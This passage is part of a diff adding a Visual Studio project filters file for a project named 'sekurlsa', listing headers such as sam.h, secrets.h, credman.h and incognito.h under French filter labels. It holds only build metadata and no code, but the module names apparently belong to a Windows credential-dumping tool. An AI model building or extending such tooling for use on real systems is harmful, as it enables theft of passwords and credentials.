Include="modules\incognito.h"> + <Filter>Modules locaux pour sekurlsa</Filter> + </ClInclude> + <ClInclude Include="modules\credman.h"> + <Filter>Modules locaux pour sekurlsa</Filter> + </ClInclude> + <ClInclude Include="modules\secrets.h"> + <Filter>Modules locaux pour sekurlsa</Filter> + </ClInclude> + <ClInclude Include="modules\sam.h"> + <Filter>Modules locaux pour sekurlsa</Filter> + </ClInclude> + </ItemGroup> + <ItemGroup> + <ResourceCompile Include="sekurlsa.rc" /> + </ItemGroup> +</Project>
\ No newline at end of file |